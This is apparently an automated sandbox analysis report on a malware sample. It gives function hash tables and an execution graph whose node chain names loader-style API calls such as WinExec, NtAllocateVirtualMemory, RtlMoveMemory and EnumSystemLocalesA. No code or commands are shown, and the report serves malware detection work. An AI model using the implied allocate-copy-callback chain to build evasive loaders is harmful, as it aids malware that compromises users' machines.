                                                                                                                            • Opcode ID: e15398dfe8d22649859a6c19dae53448eb1a412cda9f960a9cee37d72eccc3ee
                                                                                                                            • Instruction ID: 7321d066292f4de843fea0b78f8df645752b9974fa40f6637d5ac45c9663b82a
                                                                                                                            • Opcode Fuzzy Hash: e15398dfe8d22649859a6c19dae53448eb1a412cda9f960a9cee37d72eccc3ee
                                                                                                                            • Instruction Fuzzy Hash: 2E412732A1DA49CFE799DB1CC494AB877D1EF59340B5442BED04DC71B2DE26AC058780
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00007FFAAB95C809 Relevance: 1.6, APIs: 1, Instructions: 131fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 935 7ffaab95c809-7ffaab95c873 940 7ffaab95c87d-7ffaab95c8dc CreateFileW 935->940 941 7ffaab95c875-7ffaab95c87a 935->941 942 7ffaab95c8de 940->942 943 7ffaab95c8e4-7ffaab95c90c 940->943 941->940 942->943
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1648332400.00007FFAAB950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaab950000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: 9dbff6ecca2aa315b112fdbdfcd89f8d2e112a63b22cf3470d32861c6226d9d0
                                                                                                                            • Instruction ID: 5bce7bb13e29c6a0c8ec13b428b7cda9a5f705ed3fb234a722f19317080af25b
                                                                                                                            • Opcode Fuzzy Hash: 9dbff6ecca2aa315b112fdbdfcd89f8d2e112a63b22cf3470d32861c6226d9d0
                                                                                                                            • Instruction Fuzzy Hash: 0F319F7191CA5C9FDB58EF5CD845AE9BBE0FB69321F04422EE04EE3251CB71A8058BC1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00007FFAABA2055D Relevance: .7, Instructions: 671COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1654430431.00007FFAABA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABA20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaaba20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 232f3a57b737b8863ce638220fbf1804ef5282bfb37cf8667eed779ecc852e3c
                                                                                                                            • Instruction ID: e41de46f15e7ba4a3ee00e1ac664bab8db38bcac9be637a11754b0ddc684a5e6
                                                                                                                            • Opcode Fuzzy Hash: 232f3a57b737b8863ce638220fbf1804ef5282bfb37cf8667eed779ecc852e3c
                                                                                                                            • Instruction Fuzzy Hash: 82122471A1EBC58FE366972858651B57FE1EF57250B0982FFD08DC70B3E918980A83D2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00007FFAABA26335 Relevance: .4, Instructions: 442COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1654430431.00007FFAABA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABA20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaaba20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6a5946a606510157bdb5b42b9b3fdf9ca01be28da13ee7024ef1a2102a988ea0
                                                                                                                            • Instruction ID: b7fe74f21ba21b1a8201cb951cedff7a14836012c73d779de3c56ae1f534544b
                                                                                                                            • Opcode Fuzzy Hash: 6a5946a606510157bdb5b42b9b3fdf9ca01be28da13ee7024ef1a2102a988ea0
                                                                                                                            • Instruction Fuzzy Hash: F5D157B291FBC98FE765EB6C88555B97F90EF26250B1841FED08DC70B3E9189809C381
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00007FFAABA2995D Relevance: .4, Instructions: 365COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1654430431.00007FFAABA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABA20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaaba20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8ca3ac8d76e7e80c1c624e9e625305fa1eab7642eb9ac4ebc19c6dcc590070dc
                                                                                                                            • Instruction ID: 4513c9f333684e225a6984c998a66d3e42ab4843ed636e7f2d2401846dffad65
                                                                                                                            • Opcode Fuzzy Hash: 8ca3ac8d76e7e80c1c624e9e625305fa1eab7642eb9ac4ebc19c6dcc590070dc
                                                                                                                            • Instruction Fuzzy Hash: C4B1DDA191F7C98FE397977848655617FE0EF57650B0981FBD0C8CB1B3E908984AC3A2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00007FFAABA239A0 Relevance: .1, Instructions: 105COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1654430431.00007FFAABA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABA20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaaba20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 53de2596b495ec47377b27fc596627a4e4866e75c4e6c76413789c2b5fac54df
                                                                                                                            • Instruction ID: 71883a2fe8ddc57cf3da650c69f6c3936b1b03960fd851b9b1d702a18614be7c
                                                                                                                            • Opcode Fuzzy Hash: 53de2596b495ec47377b27fc596627a4e4866e75c4e6c76413789c2b5fac54df
                                                                                                                            • Instruction Fuzzy Hash: 6531F572E2FA874FF39597680466278A6C6FF87290B5481B9D04EC71F2ED29D8094280
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFAABA20F6D Relevance: .2, Instructions: 157COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1654430431.00007FFAABA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABA20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaaba20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f7485de88ffc298e14b6599050d13295bc48443b6fee9cf4dff7d039a2e0a401
                                                                                                                            • Instruction ID: ee9d8ac7024f839efe67e6e0d2740416d8f4b69dcd9d56413be42cf401805e93
                                                                                                                            • Opcode Fuzzy Hash: f7485de88ffc298e14b6599050d13295bc48443b6fee9cf4dff7d039a2e0a401
                                                                                                                            • Instruction Fuzzy Hash: AF41C6A295EBC66FE36A872858565646FA0DF43290B1D81FAD0CDCB4F3F8085C0E5391
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00007FFAABA222D9 Relevance: 5.4, Strings: 4, Instructions: 368COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1654430431.00007FFAABA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAABA20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_7ffaaba20000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 8hz$8hz$8hz$8hz
                                                                                                                            • API String ID: 0-2997940489
                                                                                                                            • Opcode ID: 2e495c9f988770dc48786f71e39d63e27360eba7e989caa33ea920b4d796815d
                                                                                                                            • Instruction ID: 68b2b3bff8942d55ef7ab8a3a08466189fc68c546b1e461d3bfc625d4fd30a42
                                                                                                                            • Opcode Fuzzy Hash: 2e495c9f988770dc48786f71e39d63e27360eba7e989caa33ea920b4d796815d
                                                                                                                            • Instruction Fuzzy Hash: 83A14662A1EBC68FE7A5876858515B07FE0DF67250B1881FBD48EC71F3E8199C0A83D1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:16%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:29.3%
                                                                                                                            Total number of Nodes:1403
                                                                                                                            Total number of Limit Nodes:17
                                                                                                                            execution_graph 33016 29a9b48 33019 299d5d0 33016->33019 33020 299d5d8 33019->33020 33020->33020 35543 2982ee0 QueryPerformanceCounter 33020->35543 33022 299d5f9 33023 299d603 InetIsOffline 33022->33023 33024 299d60d 33023->33024 33025 299d61e 33023->33025 35555 29844f4 33024->35555 33027 29844f4 11 API calls 33025->33027 33029 299d62d 33027->33029 35546 2984824 33029->35546 35544 2982ef8 GetTickCount 35543->35544 35545 2982eed 35543->35545 35544->33022 35545->33022 35547 2984835 35546->35547 35548 298485b 35547->35548 35549 2984872 35547->35549 35561 2984b90 35548->35561 35570 2984564 35549->35570 35552 29848a3 35553 2984868 35553->35552 35554 29844f4 11 API calls 35553->35554 35554->35552 35556 29844f8 35555->35556 35559 2984508 35555->35559 35558 2984564 11 API calls 35556->35558 35556->35559 35557 2984536 35557->33029 35558->35559 35559->35557 35560 2982c2c 11 API calls 35559->35560 35560->35557 35562 2984b9d 35561->35562 35569 2984bcd 35561->35569 35564 2984bc6 35562->35564 35566 2984ba9 35562->35566 35567 2984564 11 API calls 35564->35567 35565 2984bb7 35565->35553 35575 2982c44 11 API calls 35566->35575 35567->35569 35576 29844a0 35569->35576 35571 2984568 35570->35571 35572 298458c 35570->35572 35589 2982c10 35571->35589 35572->35553 35574 2984575 35574->35553 35575->35565 35577 29844c1 35576->35577 35578 29844a6 35576->35578 35577->35565 35578->35577 35580 2982c2c 35578->35580 35581 2982c3a 35580->35581 35583 2982c30 35580->35583 35581->35577 35582 2982d19 35588 2982ce8 7 API calls 35582->35588 35583->35581 35583->35582 35587 29864e4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 35583->35587 35586 2982d3a 35586->35577 35587->35582 35588->35586 35590 2982c27 35589->35590 35593 2982c14 35589->35593 35590->35574 35591 2982c1e 35591->35574 35592 2982d19 35598 2982ce8 7 API calls 35592->35598 35593->35591 35593->35592 35597 29864e4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 35593->35597 35596 2982d3a 35596->35574 35597->35592 35598->35596 35599 29a4efe 35600 2984824 11 API calls 35599->35600 35601 29a4f1f 35600->35601 36326 29847b0 35601->36326 35603 29a4f56 36341 2997be8 35603->36341 35606 2984824 11 API calls 35607 29a4f9b 35606->35607 35608 29847b0 11 API calls 35607->35608 35609 29a4fd2 35608->35609 35610 2997be8 17 API calls 35609->35610 35611 29a4ff6 35610->35611 35612 2984824 11 API calls 35611->35612 35613 29a5017 35612->35613 35614 29847b0 11 API calls 35613->35614 35615 29a504e 35614->35615 35616 2997be8 17 API calls 35615->35616 35617 29a5072 35616->35617 35618 2984824 11 API calls 35617->35618 35619 29a5093 35618->35619 35620 29847b0 11 API calls 35619->35620 35621 29a50ca 35620->35621 35622 2997be8 17 API calls 35621->35622 35623 29a50ee 35622->35623 35624 2984824 11 API calls 35623->35624 35625 29a510f 35624->35625 35626 29847b0 11 API calls 35625->35626 35627 29a5146 35626->35627 35628 2997be8 17 API calls 35627->35628 35629 29a516a 35628->35629 35630 2984824 11 API calls 35629->35630 35631 29a51a4 35630->35631 36350 299d318 35631->36350 35634 2984824 11 API calls 35635 29a5211 35634->35635 35636 29847b0 11 API calls 35635->35636 35637 29a5248 35636->35637 35638 2997be8 17 API calls 35637->35638 35639 29a526c 35638->35639 35640 2984824 11 API calls 35639->35640 35641 29a528d 35640->35641 35642 29847b0 11 API calls 35641->35642 35643 29a52c4 35642->35643 35644 2997be8 17 API calls 35643->35644 35645 29a52e8 35644->35645 35646 2984824 11 API calls 35645->35646 35647 29a5309 35646->35647 35648 29847b0 11 API calls 35647->35648 35649 29a5340 35648->35649 35650 2997be8 17 API calls 35649->35650 35651 29a5364 35650->35651 35652 2984824 11 API calls 35651->35652 35653 29a5385 35652->35653 35654 29847b0 11 API calls 35653->35654 35655 29a53bc 35654->35655 35656 29a53e0 35655->35656 35657 2997be8 17 API calls 35655->35657 35658 2984824 11 API calls 35656->35658 35657->35656 35659 29a5401 35658->35659 35660 29847b0 11 API calls 35659->35660 35661 29a5438 35660->35661 35662 2997be8 17 API calls 35661->35662 35663 29a545c 35662->35663 35664 2984824 11 API calls 35663->35664 35665 29a547d 35664->35665 35666 29847b0 11 API calls 35665->35666 35667 29a54b4 35666->35667 35668 2997be8 17 API calls 35667->35668 35669 29a54d8 35668->35669 35670 2984824 11 API calls 35669->35670 35671 29a54f9 35670->35671 35672 29847b0 11 API calls 35671->35672 35673 29a5530 35672->35673 35674 2997be8 17 API calls 35673->35674 35675 29a5554 35674->35675 35676 2984824 11 API calls 35675->35676 35677 29a5575 35676->35677 35678 29847b0 11 API calls 35677->35678 35679 29a55ac 35678->35679 35680 2997be8 17 API calls 35679->35680 35681 29a55d0 35680->35681 35682 2984824 11 API calls 35681->35682 35683 29a55f1 35682->35683 35684 29847b0 11 API calls 35683->35684 35685 29a5628 35684->35685 35686 2997be8 17 API calls 35685->35686 35687 29a564c 35686->35687 35688 29a6190 35687->35688 35689 29a5661 35687->35689 35690 2984824 11 API calls 35688->35690 35691 2984824 11 API calls 35689->35691 35692 29a61b1 35690->35692 35693 29a5682 35691->35693 35694 29847b0 11 API calls 35692->35694 35695 29847b0 11 API calls 35693->35695 35696 29a61e8 35694->35696 35697 29a56b9 35695->35697 35699 2997be8 17 API calls 35696->35699 35698 2997be8 17 API calls 35697->35698 35700 29a56dd 35698->35700 35701 29a620c 35699->35701 35702 2984824 11 API calls 35700->35702 35703 2984824 11 API calls 35701->35703 35705 29a56fe 35702->35705 35704 29a622d 35703->35704 35706 29847b0 11 API calls 35704->35706 35707 29847b0 11 API calls 35705->35707 35708 29a6264 35706->35708 35709 29a5735 35707->35709 35710 2997be8 17 API calls 35708->35710 35711 2997be8 17 API calls 35709->35711 35712 29a6288 35710->35712 35713 29a5759 35711->35713 35715 2984824 11 API calls 35712->35715 35714 2984824 11 API calls 35713->35714 35717 29a577a 35714->35717 35716 29a62a9 35715->35716 35718 29847b0 11 API calls 35716->35718 35719 29847b0 11 API calls 35717->35719 35720 29a62e0 35718->35720 35721 29a57b1 35719->35721 35722 2997be8 17 API calls 35720->35722 35723 2997be8 17 API calls 35721->35723 35724 29a6304 35722->35724 35725 29a57d5 35723->35725 35726 2984824 11 API calls 35724->35726 35727 29847b0 11 API calls 35725->35727 35731 29a6325 35726->35731 35728 29a57ed 35727->35728 35729 29a57f8 WinExec 35728->35729 35730 2984824 11 API calls 35729->35730 35733 29a581f 35730->35733 35732 29847b0 11 API calls 35731->35732 35734 29a635c 35732->35734 35735 29847b0 11 API calls 35733->35735 35736 2997be8 17 API calls 35734->35736 35737 29a5856 35735->35737 35739 29a6380 35736->35739 35740 2997be8 17 API calls 35737->35740 35738 29a6b54 35741 2984824 11 API calls 35738->35741 35739->35738 35742 2984824 11 API calls 35739->35742 35743 29a587a 35740->35743 35745 29a6b75 35741->35745 35746 29a63b6 35742->35746 35744 2984824 11 API calls 35743->35744 35747 29a589b 35744->35747 35748 29847b0 11 API calls 35745->35748 35749 29847b0 11 API calls 35746->35749 35750 29847b0 11 API calls 35747->35750 35751 29a6bac 35748->35751 35752 29a63ed 35749->35752 35753 29a58d2 35750->35753 35754 2997be8 17 API calls 35751->35754 35755 2997be8 17 API calls 35752->35755 35758 2997be8 17 API calls 35753->35758 35756 29a6bd0 35754->35756 35757 29a6411 35755->35757 35759 2984824 11 API calls 35756->35759 35760 2984824 11 API calls 35757->35760 35761 29a58f6 35758->35761 35763 29a6bf1 35759->35763 35764 29a6432 35760->35764 35762 2984824 11 API calls 35761->35762 35765 29a5917 35762->35765 35766 29847b0 11 API calls 35763->35766 35767 29847b0 11 API calls 35764->35767 35768 29847b0 11 API calls 35765->35768 35769 29a6c28 35766->35769 35770 29a6469 35767->35770 35771 29a594e 35768->35771 35772 2997be8 17 API calls 35769->35772 35773 2997be8 17 API calls 35770->35773 35776 2997be8 17 API calls 35771->35776 35774 29a6c4c 35772->35774 35775 29a648d 35773->35775 35777 2984824 11 API calls 35774->35777 35778 2984824 11 API calls 35775->35778 35779 29a5972 35776->35779 35780 29a6c6d 35777->35780 35781 29a64ae 35778->35781 36768 2999e70 29 API calls 35779->36768 35784 29847b0 11 API calls 35780->35784 35785 29847b0 11 API calls 35781->35785 35783 29a5999 35786 2984824 11 API calls 35783->35786 35787 29a6ca4 35784->35787 35788 29a64e5 35785->35788 35789 29a59ba 35786->35789 35790 2997be8 17 API calls 35787->35790 35791 2997be8 17 API calls 35788->35791 35793 29847b0 11 API calls 35789->35793 35799 29a6cc8 35790->35799 35792 29a6509 35791->35792 35794 2984824 11 API calls 35792->35794 35797 29a59f1 35793->35797 35798 29a652a 35794->35798 35795 29a74a8 35796 2984824 11 API calls 35795->35796 35805 29a74c9 35796->35805 35800 2997be8 17 API calls 35797->35800 35802 29847b0 11 API calls 35798->35802 35799->35795 35801 2984824 11 API calls 35799->35801 35803 29a5a15 35800->35803 35807 29a6d13 35801->35807 35808 29a6561 35802->35808 35804 2984824 11 API calls 35803->35804 35809 29a5a36 35804->35809 35806 29847b0 11 API calls 35805->35806 35813 29a7500 35806->35813 35810 29847b0 11 API calls 35807->35810 35811 2997be8 17 API calls 35808->35811 35814 29847b0 11 API calls 35809->35814 35817 29a6d4a 35810->35817 35812 29a6585 35811->35812 35815 2984824 11 API calls 35812->35815 35816 2997be8 17 API calls 35813->35816 35820 29a5a6d 35814->35820 35822 29a65a6 35815->35822 35818 29a7524 35816->35818 35821 2997be8 17 API calls 35817->35821 35819 2984824 11 API calls 35818->35819 35828 29a7545 35819->35828 35824 2997be8 17 API calls 35820->35824 35823 29a6d6e 35821->35823 35826 29847b0 11 API calls 35822->35826 35825 2984824 11 API calls 35823->35825 35827 29a5a91 35824->35827 35831 29a6d8f 35825->35831 35832 29a65dd 35826->35832 35829 2984824 11 API calls 35827->35829 35830 29847b0 11 API calls 35828->35830 35833 29a5ab2 35829->35833 35837 29a757c 35830->35837 35834 29847b0 11 API calls 35831->35834 35835 2997be8 17 API calls 35832->35835 35838 29847b0 11 API calls 35833->35838 35841 29a6dc6 35834->35841 35836 29a6601 35835->35836 35839 2984824 11 API calls 35836->35839 35840 2997be8 17 API calls 35837->35840 35844 29a5ae9 35838->35844 35846 29a6622 35839->35846 35842 29a75a0 35840->35842 35845 2997be8 17 API calls 35841->35845 35843 2984824 11 API calls 35842->35843 35852 29a75c1 35843->35852 35848 2997be8 17 API calls 35844->35848 35847 29a6dea 35845->35847 35850 29847b0 11 API calls 35846->35850 35849 2984824 11 API calls 35847->35849 35851 29a5b0d 35848->35851 35855 29a6e0b 35849->35855 35856 29a6659 35850->35856 35854 2984824 11 API calls 35851->35854 35853 29847b0 11 API calls 35852->35853 35861 29a75f8 35853->35861 35859 29a5b4d 35854->35859 35857 29847b0 11 API calls 35855->35857 35858 2997be8 17 API calls 35856->35858 35866 29a6e42 35857->35866 35860 29a667d 35858->35860 35865 29847b0 11 API calls 35859->35865 35862 2982ee0 2 API calls 35860->35862 35864 2997be8 17 API calls 35861->35864 35863 29a6682 35862->35863 35868 2984824 11 API calls 35863->35868 35870 29a761c 35864->35870 35871 29a5b84 35865->35871 35867 2997be8 17 API calls 35866->35867 35869 29a6e66 35867->35869 35877 29a66bb 35868->35877 36362 299d198 35869->36362 35874 2997be8 17 API calls 35870->35874 35875 2997be8 17 API calls 35871->35875 35881 29a764f 35874->35881 35878 29a5ba8 35875->35878 35876 2984824 11 API calls 35882 29a6eaa 35876->35882 35880 29847b0 11 API calls 35877->35880 35879 2984824 11 API calls 35878->35879 35883 29a5bc9 35879->35883 35886 29a66f2 35880->35886 35884 2997be8 17 API calls 35881->35884 35885 2984824 11 API calls 35882->35885 35887 29847b0 11 API calls 35883->35887 35890 29a7682 35884->35890 35891 29a6ee2 35885->35891 35888 2997be8 17 API calls 35886->35888 35894 29a5c00 35887->35894 35889 29a6716 35888->35889 35892 2984824 11 API calls 35889->35892 35893 2997be8 17 API calls 35890->35893 35895 29847b0 11 API calls 35891->35895 35897 29a6737 35892->35897 35899 29a76b5 35893->35899 35896 2997be8 17 API calls 35894->35896 35901 29a6f19 35895->35901 35898 29a5c24 35896->35898 35902 29847b0 11 API calls 35897->35902 35900 2984824 11 API calls 35898->35900 35903 2997be8 17 API calls 35899->35903 35908 29a5c45 35900->35908 35904 2997be8 17 API calls 35901->35904 35910 29a676e 35902->35910 35905 29a76e8 35903->35905 35906 29a6f3d 35904->35906 35907 2984824 11 API calls 35905->35907 35909 2984824 11 API calls 35906->35909 35914 29a7709 35907->35914 35911 29847b0 11 API calls 35908->35911 35915 29a6f5e 35909->35915 35912 2997be8 17 API calls 35910->35912 35918 29a5c7c 35911->35918 35913 29a6792 35912->35913 35916 2984824 11 API calls 35913->35916 35917 29847b0 11 API calls 35914->35917 35919 29847b0 11 API calls 35915->35919 35921 29a67b3 35916->35921 35923 29a7740 35917->35923 35920 2997be8 17 API calls 35918->35920 35924 29a6f95 35919->35924 35922 29a5ca0 35920->35922 35925 29847b0 11 API calls 35921->35925 36769 2995aa8 42 API calls 35922->36769 35927 2997be8 17 API calls 35923->35927 35929 2997be8 17 API calls 35924->35929 35934 29a67ea 35925->35934 35930 29a7764 35927->35930 35928 29a5ccc 35936 2984b90 11 API calls 35928->35936 35931 29a6fb9 35929->35931 35932 2984824 11 API calls 35930->35932 36369 2987e18 35931->36369 35935 29a7785 35932->35935 35941 2997be8 17 API calls 35934->35941 35948 29847b0 11 API calls 35935->35948 35938 29a5ce1 35936->35938 35939 2984824 11 API calls 35938->35939 35946 29a5d02 35939->35946 35940 29a72a2 35944 2984824 11 API calls 35940->35944 35943 29a680e GetCurrentProcess 35941->35943 35942 2984824 11 API calls 35950 29a6fec 35942->35950 36771 2997968 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 35943->36771 35951 29a72c3 35944->35951 35952 29847b0 11 API calls 35946->35952 35947 29a6828 35949 2984824 11 API calls 35947->35949 35955 29a77bc 35948->35955 35956 29a684e 35949->35956 35953 29847b0 11 API calls 35950->35953 35954 29847b0 11 API calls 35951->35954 35960 29a5d39 35952->35960 35961 29a7023 35953->35961 35962 29a72fa 35954->35962 35957 2997be8 17 API calls 35955->35957 35958 29847b0 11 API calls 35956->35958 35959 29a77e0 35957->35959 35969 29a6885 35958->35969 35963 2984824 11 API calls 35959->35963 35964 2997be8 17 API calls 35960->35964 35965 2997be8 17 API calls 35961->35965 35966 2997be8 17 API calls 35962->35966 35973 29a7801 35963->35973 35967 29a5d5d 35964->35967 35968 29a7047 35965->35968 35970 29a731e 35966->35970 35974 29849bc 11 API calls 35967->35974 35971 2984824 11 API calls 35968->35971 35975 2997be8 17 API calls 35969->35975 35972 2984824 11 API calls 35970->35972 35981 29a7068 35971->35981 35982 29a733f 35972->35982 35978 29847b0 11 API calls 35973->35978 35976 29a5d7a RtlMoveMemory 35974->35976 35977 29a68a9 35975->35977 35979 2984824 11 API calls 35976->35979 35980 2984824 11 API calls 35977->35980 35984 29a7838 35978->35984 35987 29a5da1 35979->35987 35986 29a68ca 35980->35986 35985 29847b0 11 API calls 35981->35985 35983 29847b0 11 API calls 35982->35983 35992 29a7376 35983->35992 35988 2997be8 17 API calls 35984->35988 35991 29a709f 35985->35991 35989 29847b0 11 API calls 35986->35989 35990 29847b0 11 API calls 35987->35990 35995 29a785c 35988->35995 35997 29a6901 35989->35997 35999 29a5dd8 35990->35999 35993 2997be8 17 API calls 35991->35993 35994 2997be8 17 API calls 35992->35994 35996 29a70c3 35993->35996 35998 29a739a 35994->35998 36002 2997be8 17 API calls 35995->36002 36000 2984824 11 API calls 35996->36000 36003 2997be8 17 API calls 35997->36003 36001 2984824 11 API calls 35998->36001 36004 2997be8 17 API calls 35999->36004 36009 29a70e4 36000->36009 36010 29a73bb 36001->36010 36011 29a788f 36002->36011 36005 29a6925 36003->36005 36006 29a5dfc 36004->36006 36008 2984824 11 API calls 36005->36008 36007 2984824 11 API calls 36006->36007 36015 29a5e1d 36007->36015 36016 29a6946 36008->36016 36012 29847b0 11 API calls 36009->36012 36013 29847b0 11 API calls 36010->36013 36014 2997be8 17 API calls 36011->36014 36019 29a711b 36012->36019 36020 29a73f2 36013->36020 36021 29a78c2 36014->36021 36018 29847b0 11 API calls 36015->36018 36017 29847b0 11 API calls 36016->36017 36026 29a697d 36017->36026 36028 29a5e54 36018->36028 36022 2997be8 17 API calls 36019->36022 36023 2997be8 17 API calls 36020->36023 36024 2997be8 17 API calls 36021->36024 36025 29a713f 36022->36025 36027 29a7416 36023->36027 36036 29a78f5 36024->36036 36373 299c74c 36025->36373 36032 2997be8 17 API calls 36026->36032 36030 2984824 11 API calls 36027->36030 36033 2997be8 17 API calls 36028->36033 36042 29a7437 36030->36042 36035 29a69a1 36032->36035 36037 29a5e78 36033->36037 36034 29844f4 11 API calls 36038 29a7164 36034->36038 36041 29849bc 11 API calls 36035->36041 36043 2997be8 17 API calls 36036->36043 36039 2984824 11 API calls 36037->36039 36040 2984824 11 API calls 36038->36040 36046 29a5e99 36039->36046 36047 29a7185 36040->36047 36044 29a69c5 36041->36044 36045 29847b0 11 API calls 36042->36045 36049 29a7928 36043->36049 36048 2984824 11 API calls 36044->36048 36051 29a746e 36045->36051 36050 29847b0 11 API calls 36046->36050 36053 29847b0 11 API calls 36047->36053 36055 29a69f4 36048->36055 36052 2997be8 17 API calls 36049->36052 36059 29a5ed0 36050->36059 36056 2997be8 17 API calls 36051->36056 36054 29a795b 36052->36054 36060 29a71bc 36053->36060 36057 2984824 11 API calls 36054->36057 36061 29847b0 11 API calls 36055->36061 36058 29a7492 36056->36058 36067 29a797c 36057->36067 36393 29849bc 36058->36393 36064 2997be8 17 API calls 36059->36064 36065 2997be8 17 API calls 36060->36065 36072 29a6a2b 36061->36072 36068 29a5ef4 36064->36068 36069 29a71e0 36065->36069 36073 29847b0 11 API calls 36067->36073 36070 2984824 11 API calls 36068->36070 36071 2984824 11 API calls 36069->36071 36075 29a5f15 36070->36075 36077 29a7201 36071->36077 36074 2997be8 17 API calls 36072->36074 36079 29a79b3 36073->36079 36076 29a6a4f 36074->36076 36080 29847b0 11 API calls 36075->36080 36078 2984824 11 API calls 36076->36078 36081 29847b0 11 API calls 36077->36081 36084 29a6a70 36078->36084 36082 2997be8 17 API calls 36079->36082 36086 29a5f4c 36080->36086 36087 29a7238 36081->36087 36083 29a79d7 36082->36083 36085 2984824 11 API calls 36083->36085 36088 29847b0 11 API calls 36084->36088 36091 29a79f8 36085->36091 36089 2997be8 17 API calls 36086->36089 36090 2997be8 17 API calls 36087->36090 36094 29a6aa7 36088->36094 36092 29a5f70 36089->36092 36101 29a725c 36090->36101 36095 29847b0 11 API calls 36091->36095 36770 299a1c0 51 API calls 36092->36770 36096 2997be8 17 API calls 36094->36096 36100 29a7a2f 36095->36100 36097 29a6acb 36096->36097 36099 2984824 11 API calls 36097->36099 36098 29a5f81 36104 29a6aec 36099->36104 36103 2997be8 17 API calls 36100->36103 36378 299c3f8 36101->36378 36106 29a7a53 36103->36106 36105 29847b0 11 API calls 36104->36105 36109 29a6b23 36105->36109 36107 2997be8 17 API calls 36106->36107 36108 29a7a86 36107->36108 36110 2984824 11 API calls 36108->36110 36111 2997be8 17 API calls 36109->36111 36113 29a7aa7 36110->36113 36112 29a6b47 EnumSystemLocalesA 36111->36112 36112->35738 36114 29847b0 11 API calls 36113->36114 36115 29a7ade 36114->36115 36116 2997be8 17 API calls 36115->36116 36117 29a7b02 36116->36117 36118 2984824 11 API calls 36117->36118 36119 29a7b23 36118->36119 36120 29847b0 11 API calls 36119->36120 36121 29a7b5a 36120->36121 36122 2997be8 17 API calls 36121->36122 36123 29a7b7e 36122->36123 36124 2984824 11 API calls 36123->36124 36125 29a7b9f 36124->36125 36126 29847b0 11 API calls 36125->36126 36127 29a7bd6 36126->36127 36128 2997be8 17 API calls 36127->36128 36129 29a7bfa 36128->36129 36130 2997be8 17 API calls 36129->36130 36131 29a7c2d 36130->36131 36132 2997be8 17 API calls 36131->36132 36133 29a7c60 36132->36133 36134 2997be8 17 API calls 36133->36134 36135 29a7c93 36134->36135 36136 2997be8 17 API calls 36135->36136 36137 29a7cc6 36136->36137 36138 2984824 11 API calls 36137->36138 36139 29a7ce7 36138->36139 36140 29847b0 11 API calls 36139->36140 36141 29a7d1e 36140->36141 36142 2997be8 17 API calls 36141->36142 36143 29a7d42 36142->36143 